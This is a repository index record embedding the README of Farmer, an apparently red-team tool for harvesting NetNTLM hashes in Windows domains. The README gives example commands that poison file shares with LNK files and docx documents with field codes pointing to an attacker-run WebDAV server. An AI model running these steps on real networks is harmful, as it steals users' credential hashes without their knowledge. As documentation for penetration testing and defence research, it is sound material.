{"id":13841120,"url":"https://github.com/mdsecactivebreach/Farmer","last_synced_at":"2025-07-11T12:30:33.905Z","repository":{"id":45171102,"uuid":"341228822","full_name":"mdsecactivebreach/Farmer","owner":"mdsecactivebreach","description":null,"archived":false,"fork":false,"pushed_at":"2021-04-28T15:27:24.000Z","size":18510,"stargazers_count":337,"open_issues_count":4,"forks_count":57,"subscribers_count":8,"default_branch":"main","last_synced_at":"2024-08-05T17:26:47.332Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mdsecactivebreach.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-02-22T14:32:29.000Z","updated_at":"2024-07-27T02:53:56.000Z","dependencies_parsed_at":"2022-07-13T18:21:36.226Z","dependency_job_id":null,"html_url":"https://github.com/mdsecactivebreach/Farmer","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mdsecactivebreach%2FFarmer","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mdsecactivebreach%2FFarmer/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mdsecactivebreach%2FFarmer/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mdsecactivebreach%2FFarmer/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mdsecactivebreach","download_url":"https://codeload.github.com/mdsecactivebreach/Farmer/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225720396,"owners_count":17513596,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:01:02.942Z","updated_at":"2024-11-21T11:30:25.154Z","avatar_url":"https://github.com/mdsecactivebreach.png","language":"C#","funding_links":[],"categories":["C# #"],"sub_categories":[],"readme":"# Farmer\n\nAuthor: @domchell\n\n## Overview\n\n*I wanted to be a farmer, so I started harvesting hashes*\n\nFarmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.\n\nIn order for Farmer to be successful, the clients MUST be able to connect to the local WebDAV server. Possible things that could prohibit this include network segmentation and/or the Windows firewall. Be sure to check these out first (*hint* Seatbelt WindowsFirewall).\n\n## Spreading the crop\n\nFarmer includes a submodule for the Crop tool, this tool can be used to create LNK files that initiate a WebDAV connection when browsing to a folder where the LNK is stored as it will try and render the stored icon.\n\nThe concept of the attack is, you should use Crop to poison the desired file shares with the LNK file pointing to the Farmer WebDAV server.\n\nFor example:\n\n```\ncrop.exe \\\\fileserver\\Common crop.lnk \\\\workstation@8888\\harvest \\\\workstation@8888\\harvest\n```\n\nWhen any user browses to \\\\fileserver\\Common, explorer will attempt to recover the icon from the Farmer WebDAV server and in doing so submit the user's NetNTLM hash.\n\n## Fertilising the crop\n\nFarmer includes another submodule for the Fertiliser tool, this tool can be used to poison Office documents (currently just docx) with a malicious field code. This causes the field code to be parsed when the document is opened and will leak the hash to the WebDAV server of your choice :)\n\nFor example:\n```\nFertiliser.exe \\\\fileserver\\important.docx http://workstation:8888/foo \"Update required\"\n```\n\n## Farming\n\nFarmer will listen on a user defined port, for a number of seconds and write the output to the filesystem if required:\n\nUsage:\n```\nfarmer.exe \u003cport\u003e [seconds] [output]\n```\n\nIf no seconds are specified, or its set to 0, farmer will run indefinitely, for example:\n\n```\nfarmer.exe 8888 0 c:\\windows\\temp\\test.tmp\n```\n\nTo run farmer for one minute on port 8888, do the following:\n\n```\nfarmer.exe 8888 60\n```\n\nIf you're wanting to write the Farmer log to the filesystem, you can AES encrypt the log file using the key set in Config.key and setting the encrypt bool to true (default false).\n\nThe log file can be decrypted with the HarvestCrop tool, for example:\n```\nharvestcrop.exe c:\\windows\\temp\\test.tmp farmer\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmdsecactivebreach%2FFarmer","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmdsecactivebreach%2FFarmer","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmdsecactivebreach%2FFarmer/lists"}